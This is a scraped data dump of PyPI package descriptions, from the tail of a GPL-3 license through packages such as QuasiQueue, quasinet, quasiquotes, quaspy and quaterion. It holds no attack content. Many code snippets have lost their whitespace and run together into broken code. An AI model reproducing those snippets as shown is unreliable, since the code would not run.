BYAPPLICABLE LAW. 
EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHTHOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTYOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULARPURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAMIS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OFALL NECESSARY SERVICING, REPAIR OR CORRECTION.16. Limitation of Liability.IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITINGWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYSTHE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANYGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THEUSE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OFDATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRDPARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OFSUCH DAMAGES.17. Interpretation of Sections 15 and 16.If the disclaimer of warranty and limitation of liability providedabove cannot be given local legal effect according to their terms,reviewing courts shall apply local law that most closely approximatesan absolute waiver of all civil liability in connection with theProgram, unless a warranty or assumption of liability accompanies acopy of the Program in return for a fee.END OF TERMS AND CONDITIONSHow to Apply These Terms to Your New ProgramsIf you develop a new program, and you want it to be of the greatestpossible use to the public, the best way to achieve this is to make itfree software which everyone can redistribute and change under these terms.To do so, attach the following notices to the program. It is safestto attach them to the start of each source file to most effectivelystate the exclusion of warranty; and each file should have at leastthe \"copyright\" line and a pointer to where the full notice is found.Copyright (C) This program is free software: you can redistribute it and/or modifyit under the terms of the GNU General Public License as published bythe Free Software Foundation, either version 3 of the License, or(at your option) any later version.This program is distributed in the hope that it will be useful,but WITHOUT ANY WARRANTY; without even the implied warranty ofMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See theGNU General Public License for more details.You should have received a copy of the GNU General Public Licensealong with this program. If not, see .Also add information on how to contact you by electronic and paper mail.If the program does terminal interaction, make it output a shortnotice like this when it starts in an interactive mode: Copyright (C) This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.This is free software, and you are welcome to redistribute itunder certain conditions; type `show c' for details.The hypothetical commands `show w' and `show c' should show the appropriateparts of the General Public License. 
Of course, your program's commands might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see. The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read.
Description-Content-Type: UNKNOWN
Description: #+TITLE: Quasi
Simple server which wraps requests and rewrites URLs; useful for tests, as it will load a cached version if it exists.
* Building
#+BEGIN_SRC shell :results raw
docker build -t quasi:latest .
#+END_SRC
* Launching
#+BEGIN_SRC shell
docker run quasi:latest
#+END_SRC
* Environment
** QUASI_DEBUG
Set this to true or false to enable debugging.
** QUASI_STUBBED_DOMAIN
This is the real domain: point your app at quasi and set this to the real URL. The first time a page is accessed, quasi will fetch it from the original domain and use the cached version going forward.
** QUASI_TOKEN
If you need an auth token for your remote domain, you can set one in this environment variable.
** QUASI_STORE
The location where you wish to store the requests, usually in a git test folder so it always works with your tests.
Platform: UNKNOWN
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: GPL-3 License
Classifier: Environment :: Web Environment
Classifier: Development Status :: 5 - Production/Stable
Classifier: Programming Language :: Python
Classifier: Operating System :: OS Independent
Classifier: Topic :: Software Development :: Libraries :: Python Modules
Classifier: Topic :: Internet
Classifier: Topic :: Internet :: WWW/HTTP
Classifier: Topic :: Internet :: WWW/HTTP :: WSGI"}
{"package": "quasicode", "pacakge-description": "No description available on PyPI."}
{"package": "quasielasticbayes", "pacakge-description": "This package wraps fortran Bayesian fitting libraries using f2py.
An application of this package is to fit quasi-elasticneutron scattering data in Mantid (https://www.mantidproject.org)"} +{"package": "quasigraph", "pacakge-description": "Quasigraphis an open-source toolkit designed for generating chemical and geometric descriptors to be used in machine learning models.InstallationThe easiest method to install quasigraph is by utilizing pip:$pipinstallquasigraphGetting startedfromase.buildimportmoleculefromquasigraphimportQuasiGraph# Initialize an Atoms object for methanol (CH3OH) using ASE's molecule functionatoms=molecule('CH3OH')# Instantiate a QuasiGraph object containing chemical and coordination numbersqgr=QuasiGraph(atoms)# Convert the QuasiGraph object into a pandas DataFramedf=qgr.get_dataframe()# Convert the QuasiGraph object into a vectorvector=qgr.get_vector()DescriptorThe descriptor can be separated into two parts, a chemical part and a geometric part.Chemical partThe chemical part of the descriptor employs theMendeleev library, incorporating atomic details like the valence electron concentration, covalent radius, atomic radius, Pauling electronegativity and electron affinitity for every element within the object.For example, for methanol (CH3OH) we have the table:VECcovalent_radiusen_pauling040.752.55160.633.44210.322.2310.322.2410.322.2510.322.2Geometric partThe geometric part involves identifying all bonds and computing the coordination numbers for each atom, indicated as CN. Additionally, the generalized coordination number (GCN)[^1] is determined by summing the coordination numbers of the neighboring ligands for each atom and normalizing this sum by the highest coordination number found in the molecule.Figure 1- Schematic representation of the methanol molecule, indicating the chemical symbol and coordination number (CN) for every atom.For example, for methanol (CH3OH) we have the geometric data, as shown inFig. 1.CNGCN41.2521.2511.0010.5011.0011.00LicenseThis is an open source code underMIT License.AcknowledgementsWe thank financial support from FAPESP (Grant No. 2022/14549-3), INCT Materials Informatics (Grant No. 406447/2022-5), and CNPq (Grant No. 311324/2020-7).[^1]: Calle-Vallejo, F., Mart\u00ednez, J. I., Garc\u00eda-Lastra, J. M., Sautet, P. & Loffreda, D.Fast Prediction of Adsorption Properties for Platinum Nanocatalysts with Generalized Coordination Numbers,Angew. Chem. Int. Ed.53, 8316-8319 (2014)."} +{"package": "quasildr", "pacakge-description": "An analytical framework for interpretable and generalizable single-cell data analysisQuasildr is a python library for quasilinear data representation methods.\nIt implements two methods, a data representation or visualization\nmethodGraphDRand a generalized trajectory extraction and inference methodStructDR(StructDR is based on nonparametric ridge estimation). The Quasildr package is developed for\nsingle-cell omics data analysis, but supports other\ndata types as well. The manuscript is availablehere.InstallYou can install withconda install -c main -c conda-forge -c bioconda quasildror withpip install quasildr. You can also clone the respository and install withgit clone https://github.com/jzthree/quasildr; cd quasildr; python setup.py install.Quick StartFor learning about the package, we recommend checking out thetutorials. We provide them in both jupyter notebooks format (you may use nteracthttps://nteract.io/to open them) or html files rendered from jupyter notebooks. The visualizations are large so Github does not allow preview, and you need to download it first. 
For various manuscript examples, checkout jupyter notebooks in theManuscriptdirectory.As a quickest possible introduction, a minimum example python snippet that running these methods are below#GraphDRimportquasildr.graphdrimportgraphdrZ=graphdr(X_pca,regularization=500)#StructDRimportquasildr.structdrimportScmsZ=Z/Z[:,0].std()s=Scms(Z,bw=0.1,min_radius=10)T=s.scms(Z)If you are analyzing single-cell data, you may consider using our\ngraphical interface for single-cell omics data analysisTrenti.DocumentationSee full API documentationhere. For a high-level introduction to two main methods in quasildr, GraphDR and StructDR (DR means Data Representation):Update logv0.2.2 (10/05/2021): Update the Trenti graphical interface app to use Dash 2.0. Bug fixes for Trenti and speed improvement from Dash 2.0.0.\nPlease update to Dash 2.0 if you will use Trenti.GraphDR - visualization and general-purpose representation:GraphDR is a nonlinear representation method\nthat preserves the interpretation of a corresponding linear space, while being able to well represent cell\nidentities like nonlinear methods. Unlike popular nonlinear methods, GraphDR allows direct\ncomparison across datasets by applying a common linear transform. GraphDR also supports incorporating\ncomplex experiment design through graph construction (see example from manuscript and ./Manuscript directory).\nGraphDR is also very fast. It can process a 1.5 million-cell dataset in 5min (CPU) or 1.5min (CPU) and\ncan easily scale to even larger datasets.StructDR - flexible structure extraction and inference of confidence sets:StructDR is based on nonparametric density ridge estimation (NRE). StructDR is a flexible framework\nfor structure extraction for single-cell data that unifies cluster, trajectory, and surface estimation\nby casting these problems as identifying 0-, 1-, and 2- dimensional density ridges. StructDR also support\nadaptively decides ridge dimensionality based on data. When used with linear representation such as PCA,\nStructDR allows inference of confidence sets of density ridge positions. This allows, for example,\nestimation of uncertainties of the developmental trajectories extracted.Command-line toolsWe also provide command-line tools to run those methods without writing any code. Basic single-cell data preprocessing options are provided inrun_graphdr.py, even though we generally recommend preprocessing single cell data with a dedicated package such as scanpy or Seurat to select highly variable genes and normalize before providing it to GraphDR. 
You can add the-hoption to access help information to each tool.run_graphdr.pypython run_graphdr.py ./example/Dentate_Gyrus.spliced_data.gz --pca --plot --log --transpose --scale --max_dim 50 --refine_iter 4 --reg 500 --no_rotation --anno_file ./example/Dentate_Gyrus.anno.gz --anno_column ClusterNamerun_structdr.pypython run_structdr.py --bw 0.1 --automatic_bw 0 --input ./example/Dentate_Gyrus.spliced_data.gz.dim50_k10_reg500_n4t12_pca_no_rotation_log_scale_transpose.graphdr.small.gz --anno_file ./example/Dentate_Gyrus.anno.small.gz --anno_column ClusterName --output ./example/Dentate_Gyrus.spliced_data.gz.dim50_k10_reg500_n4t12_pca_no_rotation_log_scale_transpose.graphdr.small.gzGraphical Interface - TrentiWe developed a web-based GUI, Trenti (Trajectory exploration interface), for single cell data visualization and exploratory analysis, supporting GraphDR, StructDR, common dimensionality reduction and clustering methods, and provide a 3D interface for visualization and a gene expression exploration interface.To use Trenti, you need to install additional dependencies:pip install umap-learn dash==2.0.0 dash-colorscales networkxSee./trenti/README.mdfor details. For a quick-start example, runpython ./trenti/app.py -i ./example/Dentate_Gyrus.data_pca.gz -f ./example/Dentate_Gyrus.spliced_data.gz -a ./example/Dentate_Gyrus.anno.gz --samplelimit=5000 --log --mode graphdrthen visitlocalhost:8050in your browser."} +{"package": "quasimc", "pacakge-description": "No description available on PyPI."} +{"package": "quasimodo", "pacakge-description": "No description available on PyPI."} +{"package": "quasinet", "pacakge-description": "QuasinetDescriptionInfer non-local structural dependencies in genomic sequences. Genomic sequences are esentially compressed encodings of phenotypic information. This package provides a novel set of tools to extract long-range structural dependencies in genotypic data that define the phenotypic outcomes. The key capabilities implemented here are as follows:Compute the Quasinet (Q-net) given a database of nucleic acid sequences. The Q-net is a family of conditional inference trees that capture the predictability of each nucleotide position given the rest of the genome. The constructed Q-net for COVID-19 and Influenza A H1N1 HA 2008-9 is shown below.COVID-19INFLUENZACompute a structure-aware evolution-adaptive notion of distance between genomes, which is demonstrably more biologically relevant compared to the standard edit distance.Draw samples in-silico that have a high probability of being biologically correct. 
For example, given a database of Influenza sequences, we can generate a new genomic sequence that has a high probability of being a valid influenza sequence.InstallationTo install with pip:pip install quasinetTo fix error with Mac or Windows:from quasinet.osfix import osfix\n# for windows\nosfix('win')\n# for max x86_64 (macbook pro)\nosfix('macx86')\n# mac arm (macbook air)\nosfix('macarm')NOTE: If trying to reproduce the paper below, please usepip install quasinet==0.0.58Dependenciesscikit-learnscipynumpynumbapandasjoblibbiopythonUsagefrom quasinet import qnet\n\n# initialize qnet\nmyqnet = qnet.Qnet()\n\n# train the qnet\nmyqnet.fit(X)\n\n# compute qdistance\nqdist = qnet.qdistance(seq1, seq2, myqnet, myqnet)ExamplesExamples are locatedhere.DocumentationFor more documentation, seehere.PapersFor reference, please check out our paper:Preparing For the Next Pandemic: Learning Wild Mutational Patterns At Scale For Analyzing Sequence Divergence In Novel PathogensAuthorsYou can reach the ZED lab at: zed.uchicago.edu"} +{"package": "quasi-poisson", "pacakge-description": "IntroductionThe purpose of this package is to estimate the Quasi-Poisson regression. It is a project in progress.Should you have any question or suggestion about the package, please feel free to drop me a line.AuthorsWenSui Liuis a seasoned data scientist with 15-year experience in the financial service industry.Joyce Liuis a college student majoring in Mathematics with a strong passion for data science."} +{"package": "quasiqueue", "pacakge-description": "QuasiQueueQuasiQueue is a MultiProcessing library for Python that makes it super easy to have long running MultiProcess jobs. QuasiQueue handles process creation and cleanup, signal management, cross process communication, and all the other garbage that makes people hate dealing with multiprocessing.QuasiQueue works by splitting the work into two components- the main process whose job it is to feed a Queue with work, and then read processes that take work off of the Queue to run. All the developers have to do is create two functions-writeris called when the queue gets low. It should return an iterable (list, generator) that QuasiQueue uses to grow the multiprocess Queue.readeris called once for each item in the Queue. It runs in a completely different process from thewriter.flowchart LR\n writer(writer)-->queue((queue))\n queue-->reader1(reader)\n queue-->reader2(reader)\n queue-->reader3(reader)\n queue-->reader4(reader)These functions can be as simple or complex as you need.importasynciofromquasiqueueimportQuasiQueueasyncdefwriter(desired_items:int):\"\"\"Feeds data to the Queue when it is low.\"\"\"returnrange(0,desired_items)asyncdefreader(identifier:int|str):\"\"\"Receives individual items from the queue.Args:identifier (int | str): Comes from the output of the Writer function\"\"\"print(f\"{identifier}\")runner=QuasiQueue(\"hello_world\",reader=reader,writer=writer,)asyncio.run(runner.main())Use CasesThere are a ton of use cases for QuasiQueue.WebServerQuasiQueue could be the basis for a web server. 
Thewritefunction would need to feed sockets to the Queue, would would be picked up by thereaderfor handling.flowchart LR\n\n subgraph Configuration\n http\n end\n\n subgraph Server\n http-->writer\n writer(writer)--socket-->queue((queue))\n queue--socket-->reader1(reader)\n queue--socket-->reader2(reader)\n queue--socket-->reader3(reader)\n queue--socket-->reader4(reader)\n endWebsite Image CrawlerQuasiQueue could be used to crawl a website, or series of websites, to download data.flowchart RL\n\n subgraph Crawler\n writer(writer)-->queue((queue))\n queue-->reader1(reader)\n end\n database(Links)--Stale or Unread Links-->writer\n reader1(reader)--Images-->FileSystem\n reader1(reader)--Found Links-->databaseAs new pages are found they get added to a database. The write pulls pages out of the database as the queue gets smaller, and the reader adds new pages that it finds to the database. The writer function can pull links that haven't been crawled at all, and once it runs out of those it can recrawl links based on their age.Image ProcessorQuasiQueue can be used to run large one off jobs as well, such as processing a list of images. If someone has several thousand images to process they can have the writer function feed the list into the Queue, and reader processes can take the files from the queue and run the processing needed.flowchart LR\n\n subgraph Configuration\n filelist\n end\n\n subgraph ImageProcessor\n filelist-->writer\n writer(writer)-->queue((queue))\n queue-->reader1(reader)\n end\n reader1(reader)-->ProcessedFilesInstallationpipinstallquasiqueueArgumentsNameThe first argument when initilizing QuasiQueue is the name of the queue. This is used when naming new processes (which makes logging andpscommands a lot more useful)ReaderThe reader function is called once per item in the queue.asyncdefreader(identifier:int|str):\"\"\"Receives individual items from the queue.Args:identifier (int | str): Comes from the output of the Writer function\"\"\"print(f\"{identifier}\")The reader can be extremely simple, as this one liner shows, or it can be extremely complex.The reader can be asynchronous or synchronous. Since each reader runs in its own process there is no performance benefits to using async, but it does make it easier for projects that use a lot of async code to reuse their existing async libraries inside of the reader.WriterThe write function is called whenever the Queue is low. It has to return an iterator of items that can be pickled (strings, integers, or sockets are common examples) that will be feed to the Reader. Generators are a great option to reduce memory usage, but even simple lists can be returned. The writer function has to be asynchronous.The writer function only has one argument- the desired number of items that QuasiQueue would like to retrieve and add to the Queue. This number is meant to allow for optimization on behalf of the developers- it can be completely ignored, but QuasiQueue will run more efficiently if you keep it as close thedesired_itemsas possible.asyncdefwriter(desired_items:int):\"\"\"Feeds data to the Queue when it is low.\"\"\"returnrange(0,desired_items)In the event that there are no items available to put in the Queue the write function should returnNone. This will signal to QuasiQueue that there is nothing for it, and it will add a slight (configurable) delay before attempting to retrieve more items.QuasiQueue will prevent items that were recently placed in the Queue from being requeued within a configurable time frame. 
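To make the image-processing use case concrete, here is a minimal sketch built only from the QuasiQueue pieces shown in this README: an async writer that returns an iterable (or None when it has nothing to hand out), a reader that receives one item per call, and QuasiQueue(name, reader=..., writer=...) driven by asyncio.run(runner.main()). The directory path, the file pattern, and the "processing" step (just a file-size lookup) are placeholder assumptions.

import asyncio
from pathlib import Path

from quasiqueue import QuasiQueue

IMAGE_DIR = Path("./images")  # placeholder input directory (assumption for the example)
_already_queued = set()       # lives in the main process, where the writer runs


async def writer(desired_items: int):
    """Feed unprocessed file paths to the queue; return None when nothing is left."""
    pending = [str(p) for p in IMAGE_DIR.glob("*.jpg") if str(p) not in _already_queued]
    if not pending:
        return None  # tells QuasiQueue to sleep briefly before asking again
    batch = pending[:desired_items]
    _already_queued.update(batch)
    return batch


def reader(identifier: int | str):
    """Runs in a separate reader process; identifier is one file path from the writer."""
    size = Path(identifier).stat().st_size  # stand-in for real image processing
    print(f"{identifier}: {size} bytes")


runner = QuasiQueue("image_processor", reader=reader, writer=writer)

if __name__ == "__main__":
    asyncio.run(runner.main())

The deduplication set is kept next to the writer because, as described in this README, the writer runs in the main process; QuasiQueue's own requeue-prevention window would also discard recent duplicates, so the set is only an extra illustration of tracking work on the writer side.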
This is meant to make the write function more lenient- if it happens to return duplicates between calls QuasiQueue will just discard them.ContextThe context function is completely optional. It runs once, and only once, when a new reader process is launched. It is used to initialize resources such as database pools so they can be reused between reader calls.If the function is provided it should return a dictionary. The reader function will need to have a context argument, which will be the results from the context function. The context function can be asynchronous or synchronous.defcontext():ctx={}ctx['http']=get_http_connection_pool()ctx['dbengine']=get_db_engine_pool()returnctxdefreader(identifier:int|str,ctx:Dict[str,Any]):\"\"\"Receives individual items from the queue.Args:identifier (int | str): Comes from the output of the Writer functionctx (Dict[str, Any]): Comes from the output of the Context function\"\"\"ctx['dbengine'].execute(\"get item\")ctx['http'].get(\"url\")print(f\"{identifier}\")runner=QuasiQueue(\"hello_world\",reader=reader,writer=writer,context=context)Although this function is not required it can have amazing performance implications. Connection pooling of databases and websites can save a remarkable amount of resources on SSL handshakes alone.SettingsQuasiQueue has a variety of optimization settings that can be tweaked depending on usage.NameTypeDescriptionDefaultempty_queue_sleep_timefloatThe time in seconds that QuasiQueue will sleep the writer process when it returns no results.1.0full_queue_sleep_timefloatThe time in seconds that QuasiQueue will sleep the writer process if the queue is completely full.5.0graceful_shutdown_timeoutintegerThe time in seconds that QuasiQueue will wait for readers to finish when it is asked to gracefully shutdown.30lookup_block_sizeintegerThe default desired_items passed to the writer function. This will be adjusted lower depending on queue dynamics.10max_jobs_per_processintegerThe number of jobs a reader process will run before it is replaced by a new process.200max_queue_sizeintegerThe max allowed size of the queue.300num_processesintegerThe number of reader processes to run.2prevent_requeuing_timeintegerThe time in seconds that an item will be prevented from being readded to the queue.300queue_interaction_timeoutfloatThe time QuasiQueue will wait for the Queue to be unlocked before throwing an error.0.01Settings can be configured programmatically, via environment variables, or both.Environment VariablesAll Settings can be configured via environment variables. The variables should start with the QuasiQueue name and an underscore. For example, if you named your QuasiQueueAcmethenACME_NUM_PROCESSwould be used to set the number of processes.ProgrammaticThere are two methods to programmatically define the settings.The first one is to initialize the settings and override the specific ones.fromquasiqueueimportSettings,QuasiQueueQuasiQueue(\"MyQueue\",reader=reader,writer=writer,settings=Settings(lookup_block_size=50))This method is simple, but the downside is that you lose the environment variable prefixes. So when using this method you have to setNUM_PROCESSESrather thanMYQUEUE_NUM_PROCESSES. 
The work around is to extend the Settings object to give it your desired prefix.fromquasiqueueimportSettings,QuasiQueuefrompydantic_settingsimportSettingsConfigDictclassMySettings(Settings)model_config=SettingsConfigDict(env_prefix=\"MY_QUEUE_\")lookup_block_size:int=50QuasiQueue(\"MyQueue\",reader=reader,writer=writer,settings=MySettings())"} +{"package": "quasiquotes", "pacakge-description": "Blocks of non-python code sprinkled in for extra seasoning.What is aquasiquoteAnquasiquoteis a new syntactical element that allows us to embed non\npython code into our existing python code. The basic structure is as follows:# coding: quasiquotes[$name|somecodegoeshere|]This desuagars to:name.quote_expr(\"some code goes here\",frame,col_offset)whereframeis the executing stack frame andcol_offsetis the column\noffset of the quasiquoter.This allows us to use slightly nicer syntax for our code.\nThe# coding: quasiquotesis needed to enable this extension.\nThe syntax is chosen to match haskell\u2019s quasiquote syntax from GHC 6.12. We need\nto use the older syntax (with the$) because python\u2019s grammar would be\nambiguous without it at the quote open step. To simplify the tokenizer, we chose\nto use slighly more verbose syntax.We may also use statement syntax for quasiquotes in a modified with block:# coding: quasiquoteswith$name:somecodegoeshereThis desuagars to:name.quote_stmt(\" some code goes here\",frame,col_offset)ThecquasiquoterThe builtincquasiquoter allows us to inline C code into our python.\nFor example:>>>fromquasiquotes.cimportc>>>deff(a):...with$c:...printf(\"%ld\\n\",PyLong_AsLong(a));...a=Py_None;...Py_INCREF(a);...print(a)...>>>f(0)0None>>>f(1)1NoneHere we can see that the quasiquoter can read from and write to the local\nscope.We can also quote C expressions with the quote expression syntax.>>>defcell_new(n):...return[$c|PyCell_New(n);]...>>>cell_new(1)Here we can see that thecquasiquoter is really convenient as a python\ninterface into the C API.WarningCPython uses a reference counting system to manage the lifetimes of objects.\nCode like:return[$|Py_None|]can cause a potential segfault whenNonebecause it will have 1 less\nreference than expected. Instead, be sure to remember to incref your\nexpressions with:return[$|Py_INCREF(Py_None);Py_None|]You must also incref when reassigning names from the enclosing python scope.\nFor more information, see theCPython docs.IPython IntegrationWe can use thecquasiquoter in the IPython repl or notebook as a cell or\nline magic. When used as a line magic, it is quoted as an expression. When used\nas a cell magic, it is quoted as a statement.In[1]:importquasiquotes.cIn[2]:a=5In[3]:%cPyObject*b=PyLong_FromLong(3);PyObject*ret=PyNumber_Add(a,b);Py_DECREF(b);ret;Out[3]:8In[4]:%%c...:printf(\"%ld+%ld=%ld\\n\",3,PyLong_AsLong(a),PyLong_AsLong(_3));...:puts(\"reassigning 'a'\");...:a=Py_None;...:Py_INCREF(a);...:3+5=8reassigning'a'In[5]:aisNoneOut[5]:True"} +{"package": "quasis", "pacakge-description": "Quasis utlity packageThis package mostly exists to make my own life easier working with AWS lambda, it exports a few useful functions regarding numbers/primality/divisibility"} +{"package": "quasi-utils", "pacakge-description": "Example PackageThis is a simple example package. 
You can useGithub-flavored Markdownto write your content.\"# quasi_utils\"python -m build\ntwine upload dist/*"} +{"package": "quask", "pacakge-description": "QuASKQuantum Advantage Seeker with KernelQuASK is a quantum machine learning software written in Python that\nsupports researchers in designing, experimenting, and assessing\ndifferent quantum and classic kernels performance. This software\nis package agnostic and can be integrated with all major quantum\nsoftware packages (e.g. IBM Qiskit, Xanadu\u2019s Pennylane, Amazon Braket).QuASK guides the user through a simple preprocessing of input data,\ndefinition and calculation of quantum and classic kernels,\neither custom or pre-defined ones. From this evaluation the package\nprovide an assessment about potential quantum advantage and prediction\nbounds on generalization error.Beyond theoretical framing, it allows for the generation of parametric\nquantum kernels that can be trained using gradient-descent-based\noptimization, grid search, or genetic algorithms. Projected quantum\nkernels, an effective solution to mitigate the curse of dimensionality\ninduced by the exponential scaling dimension of large Hilbert spaces,\nis also calculated. QuASK can also generate the observable values of\na quantum model and use them to study the prediction capabilities of\nthe quantum and classical kernels.The initial release is accompanied by the journal article\"QuASK - Quantum\nAdvantage Seeker with Kernels\" available on arxiv.org.DocumentationThe documentation for QuASK can be accessed on the websiteRead The Docs.InstallationThe software has been tested on Python 3.9.10. We recommend using this version or a newer one.The library is available on the Python Package Index (PyPI) withpip install quask.UsageUse quask as a library of software componentsQuASK can be used as a library to extend your own software. Check if everything's working with:importnumpyasnpimportquask.metricsA=np.array([[1,2],[3,4]])B=np.array([[5,6],[7,8]])print(quask.metrics.calculate_frobenius_inner_product(A,B))# 70Use quask as a command-line interface toolQuASK can be used as a command-line interface to analyze the dataset with the\nkernel methods. 
These are the commands implemented so far.To retrieve the datasets available:$ python3.9 -m quask get-datasetTo preprocess a dataset:$ python3.9 -m quask preprocess-datasetTo analyze a dataset using quantum and classical kernels:$ python3.9 -m quask apply-kernelTo create some plot of the property related to the generated Gram matrices:$ python3.9 -m quask plot-metric --metric accuracy --train-gram training_linear_kernel.npy --train-y Y_train.npy --test-gram testing_linear_kernel.npy --test-y Y_test.npy --label linearCreditsPlease cite the work using the following Bibtex entry:@article{https://doi.org/10.48550/arxiv.2206.15284,\n doi = {10.48550/ARXIV.2206.15284},\n url = {https://arxiv.org/abs/2206.15284},\n author = {Di Marcantonio, Francesco and Incudini, Massimiliano and Tezza, Davide and Grossi, Michele},\n keywords = {Quantum Physics (quant-ph), Machine Learning (cs.LG), FOS: Physical sciences, FOS: Physical sciences, FOS: Computer and information sciences, FOS: Computer and information sciences},\n title = {QuASK -- Quantum Advantage Seeker with Kernels},\n publisher = {arXiv},\n year = {2022},\n copyright = {Creative Commons Attribution 4.0 International}\n}"} +{"package": "quaspy", "pacakge-description": "QuaspyTheQuaspy(Quantum algorithm simulations in Python) library forPython3contains modules that implement:Simulators for the quantum part of Shor's order-finding algorithm[Shor94], modified as in[E22p], and the classical post-processing in[E22p]that recovers the order in a single run with very high success probability.Simulators for factoring general integers via order-finding, and the post-processing in[E21b]and[E22p]that factors any integer completely in a single order-finding run with very high success probability.Simulators for the quantum part of Shor's algorithm for computing general discrete logarithms[Shor94], modified as in[E19p], and the post-processing in[E19p]that recovers the logarithm given the order in a single run with very high probability of success.Simulators for the quantum part of Eker\u00e5\u2013H\u00e5stad's algorithm for computing short discrete logarithms[EH17], modified as in[E20]and[E23p], and the post-processing in[E23p]that recovers the logarithm in a single run with very high probability of success. This algorithm does not require the order to be known.Simulators for factoring RSA integers via short discrete logarithms, by using the reduction in[EH17], modified as in[E20]and[E23p], and the post-processing in[E23p]that factors random RSA integers in a single run with very high probability of success.All modules, classes, methods and functions inQuaspyaredocumentedusingPython3docstrings.Note thatQuaspydoes not implement support for tradeoffs in the aforementioned algorithms. Support for tradeoffs may potentially be added in the future. For the time being, see instead theQunundrumrepository with its suite of MPI programs. Note furthermore that portions ofQuaspyare inherited from theFactoritallrepository.Quaspyis a work in progress, and may be subject to major changes without prior notice.Quaspywas developed for academic research purposes. It grew out of our research project in an organic manner as research questions were posed and answered. It is distributed \"as is\" without warranty of any kind, either expressed or implied. 
For further details, see thelicense.ExamplesFor examples that illustrate how to useQuaspy, please see theexamplesdirectory in theQuaspyrepository.See also thedocumentationforQuaspyfor help on how to use the library.About and acknowledgmentsTheQuaspylibrary was developed byMartin Eker\u00e5, in part atKTH, the Royal Institute of Technology, in Stockholm,Sweden. Valuable comments and advice were provided by Johan H\u00e5stad throughout the development process.Funding and support was provided by the Swedish NCSA that is a part of theSwedish Armed Forces."} +{"package": "quasselconf", "pacakge-description": "This is a simple Python 3 application that uses PyQt5 to read (and, in\nthe future, write) Quassel configuration files.Quassel stores QVariants encoded as a string / bytestream in its\nconfiguration files, most notably to store the database connection data.\nAs a result, this information can only be accessed and modified by\nquassel itself. This program is an attempt to make reading and modifying\nthose files much easier.Currently, all this program does is dump the specified quassel config\nfile to terminal with all QVariants (or other objects) replaced by their\nstring representation. That translates the following configuration file:[Config]\nVersion=1\n\n[Core]\nCoreState=@Variant(\\0\\0\\0\\b\\0\\0\\0\\x2\\0\\0\\0 \\0\\x43\\0o\\0r\\0\\x65\\0S\\0t\\0\\x61\\0t\\0\\x65\\0V\\0\\x65\\0r\\0s\\0i\\0o\\0n\\0\\0\\0\\x2\\0\\0\\0\\x1\\0\\0\\0\\x1c\\0\\x41\\0\\x63\\0t\\0i\\0v\\0\\x65\\0S\\0\\x65\\0s\\0s\\0i\\0o\\0n\\0s\\0\\0\\0\\t\\0\\0\\0\\x1\\0\\0\\0\\x7f\\0\\0\\0\\aUserId\\0\\0\\0\\0\\x1)\nStorageSettings=@Variant(\\0\\0\\0\\b\\0\\0\\0\\x1\\0\\0\\0\\xe\\0\\x42\\0\\x61\\0\\x63\\0k\\0\\x65\\0n\\0\\x64\\0\\0\\0\\n\\0\\0\\0\\f\\0S\\0Q\\0L\\0i\\0t\\0\\x65)To the much more human-friendly output of:[Config]\nVersion=1\n\n[Core]\nCoreState={}\nStorageSettings={'Backend': 'SQLite'}Installationquasselconf can be installed as a Python module. It only has one\nexternal dependency, which is PyQt5.On systems with pip, it can be installed as follows:pip install quasselconfUsagequasselconf\u2019s command line interface is currently extremely primitive\n(as is the tool itself). It currently takes two arguments:-c[/path/to/config/dir: Much like quassel itself, you can\nspecify the location of the quassel configuration directory.Unlikequassel, the default is assumed to be /var/lib/quassel, as that is\nusually where core configuration is to be found on most (Linux)\nsystems.-t[core|client|mono]: With this flag, you can specify which\nquassel config file will be read. The default is \u201ccore\u201d. 
(\u201cmono\u201d\nrefers to the monolithic client with configuration file\nquassel.conf).The specified config file will be parsed and printed to standard output.\nIn the future, quasselconf will probably support reading in a human\nreadable configuration file from standard input and write the correct\nform to standard output.Credits / Licensequasselconf was developed by Ben Rosser and is released under the MIT\nlicense."} +{"package": "quast", "pacakge-description": "QUAST evaluates genome assemblies.\nIt works both with and without reference genomes.\nThe tool accepts multiple assemblies, thus is suitable for comparison."} +{"package": "quaterion", "pacakge-description": "Blazing fast framework for fine-tuning Similarity Learning modelsA dwarf on a giant's shoulders sees farther of the twoQuaterion is a framework for fine-tuning similarity learning models.\nThe framework closes the \"last mile\" problem in training models for semantic search, recommendations, anomaly detection, extreme classification, matching engines, e.t.c.It is designed to combine the performance of pre-trained models with specialization for the custom task while avoiding slow and costly training.Features\ud83c\udf00Warp-speed fast: With the built-in caching mechanism, Quaterion enables you to train thousands of epochs with huge batch sizes even onlaptop GPU.\ud83d\udc08\u200dSmall data compatible: Pre-trained models with specially designed head layers allow you to benefit even from a dataset you can labelin one day.\ud83c\udfd7\ufe0fCustomizable: Quaterion allows you to re-define any part of the framework, making it flexible even for large-scale and sophisticated training pipelines.\ud83c\udf0cScalable: Quaterion is built on top ofPyTorch Lightningand inherits all its scalability, cost-efficiency, and reliability 